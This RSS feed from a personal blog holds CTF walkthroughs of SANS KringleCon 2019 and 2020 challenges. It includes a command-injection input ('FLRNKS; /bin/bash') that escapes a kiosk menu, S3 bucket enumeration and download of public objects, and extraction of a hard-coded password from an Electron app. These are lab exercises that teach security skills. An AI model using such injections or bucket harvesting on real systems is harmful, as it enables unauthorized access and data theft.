<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>FLRNKS</title><link>https://flrnks.netlify.app/</link><atom:link href="https://flrnks.netlify.app/index.xml" rel="self" type="application/rss+xml"/><description>FLRNKS</description><generator>Source Themes Academic (https://sourcethemes.com/academic/)</generator><language>en-us</language><copyright>© 2024</copyright><item><title>Uncover Santa's Gift List</title><link>https://flrnks.netlify.app/tutorials/kringlecon2020/objective1/</link><pubDate>Tue, 22 Dec 2020 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2020/objective1/</guid><description>&lt;p>&lt;img src="../images/obj1/starting-point.png" alt="Starting Point">&lt;/p>
&lt;p>After a long and snowy journey I&amp;rsquo;ve finally arrived to the north pole to attend KringleCon III! I talk to &lt;code>Jingle Ringford&lt;/code> to orientate myself:&lt;/p>
&lt;blockquote>
&lt;p>Welcome! Hop in the gondola to take a ride up the mountain to Exit 19: Santa&amp;rsquo;s castle!
Santa asked me to design the new badge, and he wanted it to look really cold - like it was frosty.
Click your badge (the snowflake in the center of your avatar) to read your objectives.
If you&amp;rsquo;d like to chat with the community, join us on
&lt;a href="https://discord.gg/Wbmx92rWW3" target="_blank" rel="noopener">Discord&lt;/a>!
We have specially appointed Kringle Koncierges as helpers; you can hit them up for help in the #general channel!
If you get a minute, check out Ed Skoudis&amp;rsquo;
&lt;a href="https://www.youtube.com/watch?v=8e0SZrbWFuU" target="_blank" rel="noopener">official intro to the con&lt;/a>!
You can&amp;rsquo;t wait to get to the KingleCon but first, your should check your badge which already has your first objective ready:&lt;/p>
&lt;/blockquote>
&lt;p>I see the big billboard on the top-left near the main road. Click
&lt;a href="https://2020.kringlecon.com/textures/billboard.png" target="_blank" rel="noopener">HERE&lt;/a> to open it in a new window so that you can download it for closer inspection.&lt;/p>
&lt;p>&lt;img src="../images/obj1/objective1.png" alt="Objective1">&lt;/p>
&lt;p>Some hints from the badge to get started with the image manipulation:&lt;/p>
&lt;ul>
&lt;li>There are
&lt;a href="https://www.photopea.com/" target="_blank" rel="noopener">tools&lt;/a> out there that could help Filter the Distortion that is this Twirl.&lt;/li>
&lt;li>Make sure you Lasso the correct twirly area.&lt;/li>
&lt;/ul>
&lt;p>It seems that to recover Santa&amp;rsquo;s gift to
&lt;a href="https://twitter.com/joswr1ght?lang=en" target="_blank" rel="noopener">Josh Wright&lt;/a> I will need to do a bit of image manipulation to un-twirl the photo&amp;rsquo;s section which contains the list.&lt;/p>
&lt;p>Luckily they shared a link to this online tool which can do this quite easily.&lt;/p>
&lt;p>After fiddling around with it for a few minutes, I managed to un-twirl it enough to read it: &lt;code>proxmark&lt;/code>&lt;/p>
&lt;p>&lt;img src="../images/obj1/proxmark.png" alt="Proxmark">&lt;/p>
&lt;p>
&lt;a href="https://proxmark.com/" target="_blank" rel="noopener">Click&lt;/a> to learn more about what &lt;code>proxmark&lt;/code> is, it may be useful later on &amp;hellip;&lt;/p>
&lt;p>On to the next objective! 😎&lt;/p></description></item><item><title>Talk to Santa in the Quad</title><link>https://flrnks.netlify.app/tutorials/kringlecon2019/objective0/</link><pubDate>Sat, 28 Dec 2019 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2019/objective0/</guid><description>&lt;h2 id="greetings-from-santa">Greetings from Santa&lt;/h2>
&lt;p>This is the very beginning of your journey at the &lt;strong>Elf University&lt;/strong>. Your just arrived to the North Pole by train and your starting position looks something like the below:&lt;/p>
&lt;p>&lt;img src="../images/obj0-start.png" alt="Starting position">&lt;/p>
&lt;p>You can interact with the characters by clicking on them (repeatedly clicking will reveal their full message), and you can also interact with certain objects that will either open some command line terminal or a full website in a frame. If you click on Santa a few times he provide the below greeting:&lt;/p>
&lt;blockquote>
&lt;p>Welcome to the North Pole and KringleCon 2!
Last year, KringleCon hosted over 17,500 attendees and my castle got a little crowded.
We moved the event to Elf University (Elf U for short), the North Pole’s largest venue.
Please feel free to explore, watch talks, and enjoy the con!&lt;/p>
&lt;/blockquote>
&lt;p>As you can notice, you are not alone at the North Pole. One of the coolest things of the challenge is that you get to interact with like-minded people through the game interface. Whenever you feel lost, you should ask in the chat for some guidance. Just be sure not to ask for direct solutions, because that would ruin all the fun, wouldn&amp;rsquo;t it? :)&lt;/p>
&lt;p>Another great feature is the personal badge on your avatar, which you can click at any point and will provide useful information on your objectives and accomplishments.&lt;/p>
&lt;p>&lt;img src="../images/obj0-badge.png" alt="Starting position">&lt;/p>
&lt;h2 id="get-outta-here">Get outta here&lt;/h2>
&lt;p>In this zeroth(?!) objective you need to find Santa in another room called &lt;strong>The Quad&lt;/strong> so your main job is to find the way out of the &lt;strong>Train Station&lt;/strong>. Navigation works either via mouse-clicks or via the arrow keys on your keyboard. To go to &lt;strong>The Quad&lt;/strong> simply start going upwards until you find yourself in another space.&lt;/p>
&lt;p>&lt;img src="../images/obj0-quad.png" alt="Santa in The Quad">&lt;/p>
&lt;p>Once you found Santa, who is quite hard to miss, as he stands right in the middle of &lt;strong>The Quad&lt;/strong>, you can click on him a few times to complete Objective 0 and receive further instructions:&lt;/p>
&lt;blockquote>
&lt;p>This is a little embarrassing, but I need your help.
Our KringleCon turtle dove mascots are missing!
They probably just wandered off.
Can you please help find them?
To help you search for them and get acquainted with KringleCon, I’ve created some objectives for you. You can see them in your &amp;gt; badge.
Where&amp;rsquo;s your badge? Oh! It&amp;rsquo;s that big, circle emblem on your chest - give it a tap!
We made them in two flavors - one for our new guests, and one for those who&amp;rsquo;ve attended both KringleCons.
After you find the Turtle Doves and complete objectives 2-5, please come back and let me know.
Not sure where to start? Try hopping around campus and talking to some elves.
If you help my elves with some quicker problems, they&amp;rsquo;ll probably remember clues for the objectives.&lt;/p>
&lt;/blockquote></description></item><item><title>Investigate S3 Bucket</title><link>https://flrnks.netlify.app/tutorials/kringlecon2020/objective2/</link><pubDate>Tue, 22 Dec 2020 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2020/objective2/</guid><description>&lt;p>&lt;img src="../images/obj2/objective2.png" alt="Objective2">&lt;/p>
&lt;p>After recovering Santa&amp;rsquo;s gift list, I take the snow lift and arrive to the Kringle Castle&amp;rsquo;s &lt;strong>Front Lawn&lt;/strong>. Here, I find a few characters here, including Santa himself, who greets me right away:&lt;/p>
&lt;p>&lt;img src="../images/obj2/front-lawn-santa.png" alt="Front Lawn Greeting">&lt;/p>
&lt;blockquote>
&lt;p>Hello and welcome to the North Pole!
We’re super excited about this year’s KringleCon 3: French Hens.
My elves have been working all year to upgrade the castle.
It was a HUGE construction project, and we’ve nearly completed it.
Please pardon the remaining construction dust around the castle and enjoy yourselves!&lt;/p>
&lt;/blockquote>
&lt;p>The 2nd objective in the badge instructs me to investigate some S3 bucket used at the North Pole. For hints, I talk with &lt;code>Shinny Upatree&lt;/code> in the bottom right corner. But before, he asks for a favor with the Kringle Kiosk terminal:&lt;/p>
&lt;p>&lt;img src="../images/obj2/shinny-upatree.png" alt="Shinny Upatree">&lt;/p>
&lt;blockquote>
&lt;p>Hiya hiya - I&amp;rsquo;m Shinny Upatree!
Check out this cool KringleCon kiosk!
You can get a map of the castle, learn about where the elves are, and get your own badge printed right on-screen!
Be careful with that last one though. I heard someone say it&amp;rsquo;s &amp;ldquo;ingestible.&amp;rdquo; Or something&amp;hellip;
Do you think you could check and see if there is an issue?&lt;/p>
&lt;/blockquote>
&lt;p>The &lt;strong>Kringle Kiosk&lt;/strong> challenge involves escaping from the application via a
&lt;a href="https://owasp.org/www-community/attacks/Command_Injection" target="_blank" rel="noopener">Command Injection&lt;/a>:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln">1&lt;/span>Welcome to our castle, we&lt;span class="s1">&amp;#39;re so glad to have you with us!
&lt;/span>&lt;span class="ln">2&lt;/span>&lt;span class="s1">Come and browse the kiosk; though our app&amp;#39;&lt;/span>s a bit suspicious.
&lt;span class="ln">3&lt;/span>Poke around, try running bash, please try to come discover,
&lt;span class="ln">4&lt;/span>Need our devs who made our app pull/patch to &lt;span class="nb">help&lt;/span> recover?
&lt;span class="ln">5&lt;/span>
&lt;span class="hl">&lt;span class="ln">6&lt;/span>Escape the menu by launching /bin/bash &lt;span class="s">&amp;lt;&amp;lt; THE T&lt;/span>ASK!
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Once I open the Kiosk and hit enter, I see a list of menu items to choose from:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln"> 1&lt;/span>~~~~~~~~~~~~~~~~~~~~~~~~~~~~
&lt;span class="ln"> 2&lt;/span> Welcome to the North Pole!
&lt;span class="ln"> 3&lt;/span>~~~~~~~~~~~~~~~~~~~~~~~~~~~~
&lt;span class="ln"> 4&lt;/span>1. Map
&lt;span class="ln"> 5&lt;/span>2. Code of Conduct and Terms of Use
&lt;span class="ln"> 6&lt;/span>3. Directory
&lt;span class="hl">&lt;span class="ln"> 7&lt;/span>4. Print Name Badge
&lt;/span>&lt;span class="ln"> 8&lt;/span>5. Exit
&lt;span class="ln"> 9&lt;/span>
&lt;span class="ln">10&lt;/span>Please &lt;span class="k">select&lt;/span> an item from the menu by entering a single number.
&lt;span class="ln">11&lt;/span>Anything &lt;span class="k">else&lt;/span> might have ... unintended consequences.
&lt;span class="ln">12&lt;/span>Enter choice &lt;span class="o">[&lt;/span>&lt;span class="m">1&lt;/span> - 5&lt;span class="o">]&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Keeping in mind Shinny&amp;rsquo;s advice about &lt;strong>option 4&lt;/strong> that&amp;rsquo;s used to print badges, I chose that option. This may be the one that has the &lt;strong>Command Injection&lt;/strong> flaw. When it&amp;rsquo;s selected it even has a warning about special characters. Let&amp;rsquo;s see how it handles my username + some special characters: &lt;code>FLRNKS; /bin/bash&lt;/code>&lt;/p>
&lt;p>&lt;img src="../images/obj2/hello-from-bash.png" alt="Command Injection in Kringle Kiosk">&lt;/p>
&lt;p>Now that wasn&amp;rsquo;t too hard! I then talk to Shinny to get those hints he promised:&lt;/p>
&lt;blockquote>
&lt;p>Golly - wow! You sure found the flaw for us!
Say, we&amp;rsquo;ve been having an issue with an Amazon S3 bucket.
Do you think you could help find Santa&amp;rsquo;s package file?
Jeepers, it seems there&amp;rsquo;s always a leaky bucket in the news. You&amp;rsquo;d think we could find our own files!
Digininja has a great guide, if you&amp;rsquo;re new to S3 searching.
He even released a tool for the task - what a guy!
The package wrapper Santa used is reversible, but it may take you some trying.
Good luck, and thanks for pitching in!&lt;/p>
&lt;/blockquote>
&lt;p>Some hints also from the badge:&lt;/p>
&lt;ul>
&lt;li>It seems there&amp;rsquo;s a new story every week about data exposed in unprotected
&lt;a href="https://www.computerweekly.com/news/252491842/Leaky-AWS-S3-bucket-once-again-at-centre-of-data-breach" target="_blank" rel="noopener">AWS S3 buckets&lt;/a>&lt;/li>
&lt;li>Find Santa&amp;rsquo;s package file in S3, see Josh Wright&amp;rsquo;s
&lt;a href="https://www.youtube.com/watch?v=t4UzXx5JHk0" target="_blank" rel="noopener">talk&lt;/a> for tips&lt;/li>
&lt;li>Robin Wood wrote up a
&lt;a href="https://digi.ninja/blog/whats_in_amazons_buckets.php" target="_blank" rel="noopener">guide&lt;/a> about finding these open S3 buckets&lt;/li>
&lt;li>He even wrote a
&lt;a href="https://digi.ninja/projects/bucket_finder.php" target="_blank" rel="noopener">tool&lt;/a> to search for unprotected buckets&lt;/li>
&lt;li>Santa&amp;rsquo;s Wrapper3000 is pretty buggy. It uses several compression tools, binary to ASCII conversion, and other tools to wrap packages.&lt;/li>
&lt;/ul>
&lt;p>To get started I click on the terminal to the right side of Shinny, that brings up a new terminal CLI:&lt;/p>
&lt;p>&lt;img src="../images/obj2/wrapper.png" alt="Wrapper3000 Welcome">&lt;/p>
&lt;p>On the terminal&amp;rsquo;s file system there is a folder called &lt;code>bucket_finder&lt;/code> that contains a Ruby Script and a &lt;strong>wordlist&lt;/strong>. The script can take this wordlist and iterate over each line and test if a S3 bucket with such a name exists and whether it&amp;rsquo;s public. With the &lt;code>--download&lt;/code> flag, it can also download all available objects if a public bucket is found.&lt;/p>
&lt;p>The &lt;strong>wordlist&lt;/strong> initially contains only 3 words and none of them map to the bucket I need. Part of the challenge was to come up with new entries in the &lt;strong>wordlist&lt;/strong> in order to find the bucket. While thinking of possibilities, I remembered the Terminal MOTD which had a brightly emphasized word &lt;code>Wrapper3000&lt;/code>, so I added two variants of it to the list. First I added it as it was, then with lowercase &lt;code>W&lt;/code>, remembering that S3 bucket names are case-sensitive. Lo and behold, the lower-case version was the name of the bucket which had the &lt;code>package&lt;/code> file I needed:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln">1&lt;/span>elf@6baea2e4fddd:~/bucket_finder$ cat wordlist
&lt;span class="ln">2&lt;/span>...
&lt;span class="ln">3&lt;/span>Wrapper3000
&lt;span class="ln">4&lt;/span>wrapper3000
&lt;span class="ln">5&lt;/span>elf@6baea2e4fddd:~/bucket_finder$ ./bucket_finder.rb wordlist
&lt;span class="ln">6&lt;/span>...
&lt;span class="ln">7&lt;/span>Bucket does not exist: Wrapper3000
&lt;span class="ln">8&lt;/span>Bucket Found: wrapper3000 &lt;span class="o">(&lt;/span> http://s3.amazonaws.com/wrapper3000 &lt;span class="o">)&lt;/span>
&lt;span class="hl">&lt;span class="ln">9&lt;/span> &amp;lt;Public&amp;gt; http://s3.amazonaws.com/wrapper3000/package &amp;lt;&amp;lt; THE FILE WE NEED!
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Running the Ruby script again with &lt;code>--download&lt;/code> flag cloned the bucket to a subdirectory called &lt;strong>wrapper3000&lt;/strong>. Next I navigated to this directory and started inspecting the contents of &lt;code>package&lt;/code>:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln">1&lt;/span>elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ file package
&lt;span class="ln">2&lt;/span>package: ASCII text, with very long lines
&lt;span class="ln">3&lt;/span>elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ cat package
&lt;span class="hl">&lt;span class="ln">4&lt;/span>UEsDBAoAAAAAAIAwhFEbRT8anwEAAJ8BAAAcABwAcGFja2FnZS50eHQuWi54ei54eGQudGFyLmJ6MlVUCQADoBfKX6AXyl91eAsAAQT2AQAABBQAAABCWmg5MUFZJlNZ2ktivwABHv+Q3hASgGSn//AvBxDwf/xe0gQAAAgwAVmkYRTKe1PVM9U0ekMg2poAAAGgPUPUGqehhCMSgaBoAD1NNAAAAyEmJpR5QGg0bSPU/VA0eo9IaHqBkxw2YZK2NUASOegDIzwMXMHBCFACgIEvQ2Jrg8V50tDjh61Pt3Q8CmgpFFunc1Ipui+SqsYB04M/gWKKc0Vs2DXkzeJmiktINqjo3JjKAA4dLgLtPN15oADLe80tnfLGXhIWaJMiEeSX992uxodRJ6EAzIFzqSbWtnNqCTEDML9AK7HHSzyyBYKwCFBVJh17T636a6YgyjX0eE0IsCbjcBkRPgkKz6q0okb1sWicMaky2Mgsqw2nUm5ayPHUeIktnBIvkiUWxYEiRs5nFOM8MTk8SitV7lcxOKst2QedSxZ851ceDQexsLsJ3C89Z/gQ6Xn6KBKqFsKyTkaqO+1FgmImtHKoJkMctd2B9JkcwvMr+hWIEcIQjAZGhSKYNPxHJFqJ3t32Vjgn/OGdQJiIHv4u5IpwoSG0lsV+UEsBAh4DCgAAAAAAgDCEURtFPxqfAQAAnwEAABwAGAAAAAAAAAAAAKSBAAAAAHBhY2thZ2UudHh0LloueHoueHhkLnRhci5iejJVVAUAA6AXyl91eAsAAQT2AQAABBQAAABQSwUGAAAAAAEAAQBiAAAA9QEAAAAA
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Right away it looked like it was base64 encoded text, so I ran it through &lt;code>base64 -d &lt;/code>. Then I checked what kind of file was recovered, and it was in fact a compressed ZIP file:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln">1&lt;/span>elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ cat package &lt;span class="p">|&lt;/span> base64 -d &amp;gt; package-decoded
&lt;span class="ln">2&lt;/span>elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ file package-decoded
&lt;span class="hl">&lt;span class="ln">3&lt;/span>package-decoded: Zip archive data, at least v1.0 to extract
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Next I used &lt;code>unzip&lt;/code> to recover the file that was hiding in this ZIP. The resulting file had a rather long list of extensions which suggested there was more unwrapping to do:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln">1&lt;/span>elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ unzip package-decoded
&lt;span class="ln">2&lt;/span>Archive: package-decoded extracting: package.txt.Z.xz.xxd.tar.bz2
&lt;span class="ln">3&lt;/span>elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ file package.txt.Z.xz.xxd.tar.bz2
&lt;span class="hl">&lt;span class="ln">4&lt;/span>package.txt.Z.xz.xxd.tar.bz2: bzip2 compressed data, block &lt;span class="nv">size&lt;/span> &lt;span class="o">=&lt;/span> 900k
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Next, I started peeling back each layer of encoding/compression in reverse order to finally reveal the solution of this Objective:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln">1&lt;/span>elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ bunzip2 package.txt.Z.xz.xxd.tar.bz2
&lt;span class="ln">2&lt;/span>elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ tar xopf package.txt.Z.xz.xxd.tar
&lt;span class="ln">3&lt;/span>elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ xxd -r package.txt.Z.xz.xxd &amp;gt; package.txt.Z.xz
&lt;span class="ln">4&lt;/span>elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ unxz package.txt.Z.xz
&lt;span class="ln">5&lt;/span>elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ uncompress package.txt.Z
&lt;span class="ln">6&lt;/span>elf@6baea2e4fddd:~/bucket_finder/wrapper3000$ cat package.txt
&lt;span class="hl">&lt;span class="ln">7&lt;/span>North Pole: The Frostiest Place on Earth
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Brrrrrr &amp;hellip; 🥶 On to the next objective!&lt;/p></description></item><item><title>Find the Turtle Doves</title><link>https://flrnks.netlify.app/tutorials/kringlecon2019/objective1/</link><pubDate>Sat, 28 Dec 2019 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2019/objective1/</guid><description>&lt;h2 id="where-the-doves-at">Where the doves at?&lt;/h2>
&lt;p>After talking with Santa in &lt;strong>The Quad&lt;/strong> you get your new objective: &lt;strong>Find the Turtle Doves&lt;/strong>. They are the official mascot of this year&amp;rsquo;s challenge, and you need to find them before it&amp;rsquo;s too late!&lt;/p>
&lt;p>To be sure, there is not much else to do, except go around and explore until you find them. Once you do find them, be sure to click on the text over their head to make your objective complete! &lt;strong>Hint&lt;/strong>: they are warming up somewhere near a fireplace&amp;hellip; :)&lt;/p>
&lt;p>&lt;img src="../images/obj1-doves.png" alt="Doves by the fireplace">&lt;/p>
&lt;p>You get some valuable further clues one you find them and click them a few times:&lt;/p>
&lt;blockquote>
&lt;p>Hoot Hooot?
&amp;hellip;
Hoot Hooot?
&amp;hellip;
Hoot Hooot?
&amp;hellip;
Hoot Hooot?&lt;/p>
&lt;/blockquote>
&lt;p>But jokes aside, at this point you should be familiar with the inner functioning of the challenge universe at the North Pole. Now you are ready to start working on the real stuff.&lt;/p></description></item><item><title>Point-of-Sale Password Recovery</title><link>https://flrnks.netlify.app/tutorials/kringlecon2020/objective3/</link><pubDate>Tue, 22 Dec 2020 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2020/objective3/</guid><description>&lt;p>&lt;img src="../images/obj3/objective3.png" alt="Objective3">&lt;/p>
&lt;p>After solving the S3 bucket challenge, this new objective leads me to the courtyard where I meet up with &lt;code>Sugarplum Mary&lt;/code> to help her recover a lost password for the PoS terminal:&lt;/p>
&lt;p>&lt;img src="../images/obj3/sugarplum-mary.png" alt="Sugarplum Mary">&lt;/p>
&lt;blockquote>
&lt;p>Sugarplum Mary? That&amp;rsquo;s me!
I was just playing with this here terminal and learning some Linux!
It&amp;rsquo;s a great intro to the Bash terminal.
If you get stuck at any point, type hintme to get a nudge!
Can you make it to the end?&lt;/p>
&lt;/blockquote>
&lt;p>This terminal was like a quick refresher/lesson to hone your Linux Terminal skillz. I used the below list of commands to solve it:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln"> 1&lt;/span>ls
&lt;span class="ln"> 2&lt;/span>cat munchkin_19315479765589239
&lt;span class="ln"> 3&lt;/span>rm munchkin_19315479765589239
&lt;span class="ln"> 4&lt;/span>&lt;span class="nb">pwd&lt;/span>
&lt;span class="ln"> 5&lt;/span>ls -la &lt;span class="p">|&lt;/span> grep munchkin
&lt;span class="ln"> 6&lt;/span>cat .bash_history &lt;span class="p">|&lt;/span> grep munchkin
&lt;span class="ln"> 7&lt;/span>env &lt;span class="p">|&lt;/span> grep munchkin
&lt;span class="ln"> 8&lt;/span>&lt;span class="nb">cd&lt;/span> workshop
&lt;span class="ln"> 9&lt;/span>find . -type f -name &lt;span class="s2">&amp;#34;toolbox*.txt&amp;#34;&lt;/span> &lt;span class="p">|&lt;/span> xargs grep -i munchkin
&lt;span class="ln">10&lt;/span>chmod +x lollipop_engine
&lt;span class="ln">11&lt;/span>./lollipop_engine
&lt;span class="ln">12&lt;/span>&lt;span class="nb">cd&lt;/span> electrical/
&lt;span class="ln">13&lt;/span>mv blown_fuse0 fuse0
&lt;span class="ln">14&lt;/span>ln -s fuse0 fuse1
&lt;span class="ln">15&lt;/span>cp fuse1 fuse2
&lt;span class="ln">16&lt;/span>&lt;span class="nb">echo&lt;/span> &lt;span class="s2">&amp;#34;MUNCHKIN_REPELLENT&amp;#34;&lt;/span> &amp;gt;&amp;gt; fuse2
&lt;span class="ln">17&lt;/span>&lt;span class="nb">cd&lt;/span> /opt/munchkin_den/
&lt;span class="ln">18&lt;/span>find .
&lt;span class="ln">19&lt;/span>find . -user munchkin
&lt;span class="ln">20&lt;/span>find . -size +108k -size -110k
&lt;span class="ln">21&lt;/span>ps a
&lt;span class="ln">22&lt;/span>netstat -l
&lt;span class="ln">23&lt;/span>curl http://0.0.0.0:54321
&lt;span class="ln">24&lt;/span>&lt;span class="nb">kill&lt;/span> -s &lt;span class="m">9&lt;/span> &lt;span class="m">11555&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>The interactive nature of the whole terminal reminded me of the Mini NetWars challenges from earlier this year, which was a nice feeling! Talking to Mary again revealed the below hints about them main objective:&lt;/p>
&lt;blockquote>
&lt;p>You did it - great! Maybe you can help me configure my postfix mail server on Gentoo!
Just kidding!
Hey, wouldja&amp;rsquo; mind helping me get into my point-of-sale terminal?
Just kidding!
It&amp;rsquo;s down, and we kinda&amp;rsquo; need it running..
Problem is: it is asking for a password. I never set one!
Can you help me figure out what it is so I can get set up?
Shinny says this might be an Electron application.
I hear there&amp;rsquo;s a way to extract an ASAR file from the binary, but I haven&amp;rsquo;t looked into it yet.&lt;/p>
&lt;/blockquote>
&lt;p>&amp;hellip; and the hints from the badge:&lt;/p>
&lt;ul>
&lt;li>It&amp;rsquo;s possible to extract the source code from an
&lt;a href="https://www.electronjs.org/" target="_blank" rel="noopener">Electron&lt;/a> app.&lt;/li>
&lt;li>There are
&lt;a href="https://www.npmjs.com/package/asar" target="_blank" rel="noopener">tools&lt;/a> and
&lt;a href="https://medium.com/how-to-electron/how-to-get-source-code-of-any-electron-application-cbb5c7726c37" target="_blank" rel="noopener">guides&lt;/a> explaining how to extract ASAR from Electron apps.&lt;/li>
&lt;li>the PoS firmware is available to download
&lt;a href="https://download.holidayhackchallenge.com/2020/santa-shop/santa-shop.exe" target="_blank" rel="noopener">HERE&lt;/a> as a 47MB .exe file&lt;/li>
&lt;/ul>
&lt;p>To get started I spun up a Windows VM on my MacBook and downloaded the exe within this machine. I also installed
&lt;a href="https://www.7-zip.org/" target="_blank" rel="noopener">7zip&lt;/a> to help with unpacking the EXE file with the goal of recovering the &lt;strong>asar&lt;/strong> file which contains the source code for the app. After opening the exe in 7zip, I found the &lt;code>app.asar&lt;/code> in the &lt;strong>resources&lt;/strong> subdirectory, which I extracted to my working folder:&lt;/p>
&lt;p>&lt;img src="../images/obj3/asar.png" alt="asar in resources">&lt;/p>
&lt;p>Next, I used the Windows Command Prompt, installed NPM and the &lt;code>asar&lt;/code> packaging tool to help unpack the recovered &lt;strong>app.asar&lt;/strong> file:&lt;/p>
&lt;p>&lt;img src="../images/obj3/asar-extract.png" alt="recover soruce code">&lt;/p>
&lt;p>This operation recovered several files, reading the README pointed me directly to &lt;code>main.js&lt;/code> which had the password right at the top of the file:&lt;/p>
&lt;p>&lt;img src="../images/obj3/santapass.png" alt="main.js">&lt;/p>
&lt;p>On to the next one! 😎&lt;/p></description></item><item><title>Unredact Threatening Document</title><link>https://flrnks.netlify.app/tutorials/kringlecon2019/objective2/</link><pubDate>Sat, 28 Dec 2019 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2019/objective2/</guid><description>&lt;h2 id="un-redact-that-thing">Un-redact that thing!&lt;/h2>
&lt;p>The instructions from the badge:&lt;/p>
&lt;blockquote>
&lt;p>Someone sent a threatening letter to Elf University.
What is the first word in ALL CAPS in the subject line of the letter?
Please find the letter in the Quad.&lt;/p>
&lt;/blockquote>
&lt;p>Much like finding the Turtle Doves, there is not much else to do but to explore the environment with careful attention to details, such as documents lying around &amp;hellip; until you find it:&lt;/p>
&lt;p>&lt;img src="../images/obj2-doc.png" alt="Demanding redacted document">&lt;/p>
&lt;p>When you click the piece of paper in the corner, you will be redirected to an URL which loads a PDF document with some redacted parts.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">https://downloads.elfu.org/LetterToElfUPersonnel.pdf
&lt;/code>&lt;/pre>&lt;/div>&lt;p>In order to read the redacted part, simply hit Ctrl+A or use the mouse to select all text, and copy paste it into some empty text editor, to reveal the full, un-redacted contents.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-text" data-lang="text">Date: February 28, 2019
To the Administration, Faculty, and Staff of Elf University
17 Christmas Tree Lane
North Pole
From: A Concerned and Aggrieved Character
Subject: DEMAND: Spread Holiday Cheer to Other Holidays and Mythical Characters… OR
ELSE!
Attention All Elf University Personnel,
It remains a constant source of frustration that Elf University and the entire operation at the
North Pole focuses exclusively on Mr. S. Claus and his year-end holiday spree. We URGE
you to consider lending your considerable resources and expertise in providing merriment,
cheer, toys, candy, and much more to other holidays year-round, as well as to other mythical
characters.
For centuries, we have expressed our frustration at your lack of willingness to spread your
cheer beyond the inaptly-called “Holiday Season.” There are many other perfectly fine
holidays and mythical characters that need your direct support year-round.
If you do not accede to our demands, we will be forced to take matters into our own hands.
We do not make this threat lightly. You have less than six months to act demonstrably.
Sincerely,
--A Concerned and Aggrieved Character
Confidential
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Now you can submit the string &lt;strong>DEMAND&lt;/strong> in the input field on your personal badge so solve the objective.&lt;/p></description></item><item><title>Operate the Santavator</title><link>https://flrnks.netlify.app/tutorials/kringlecon2020/objective4/</link><pubDate>Thu, 24 Dec 2020 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2020/objective4/</guid><description>&lt;p>&lt;img src="../images/obj4/objective4.png" alt="Objective4">&lt;/p>
&lt;p>This objective leads me back to the Kringle Castle&amp;rsquo;s &lt;strong>Front Lawn&lt;/strong> to talk with &lt;code>Pepper Minstix&lt;/code> for hints to the operation of the Santavator, as long as I help with his terminal before:&lt;/p>
&lt;p>&lt;img src="../images/obj4/pepper-minstix.png" alt="Pepper Minstix">&lt;/p>
&lt;blockquote>
&lt;p>Howdy - Pepper Minstix here!
I&amp;rsquo;ve been playing with tmux lately, and golly it&amp;rsquo;s useful.
Problem is: I somehow became detached from my session.
Do you think you could get me back to where I was, admiring a beautiful bird?
If you find it handy, there&amp;rsquo;s a tmux cheat sheet you can use as a reference.
I hope you can help!&lt;/p>
&lt;/blockquote>
&lt;p>I think this was the simplest one so far. Reading up on
&lt;a href="https://tmuxcheatsheet.com/" target="_blank" rel="noopener">TMUX&lt;/a> I found a way to list all sessions by issuing &lt;code>tmux ls&lt;/code>, which revealed that there was one session created recently:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln">1&lt;/span>elf@6da9144bb25b:~$ tmux ls
&lt;span class="hl">&lt;span class="ln">2&lt;/span>0: &lt;span class="m">1&lt;/span> windows &lt;span class="o">(&lt;/span>created Sun Dec &lt;span class="m">27&lt;/span> 10:28:11 2020&lt;span class="o">)&lt;/span> &lt;span class="o">[&lt;/span>80x24&lt;span class="o">]&lt;/span>
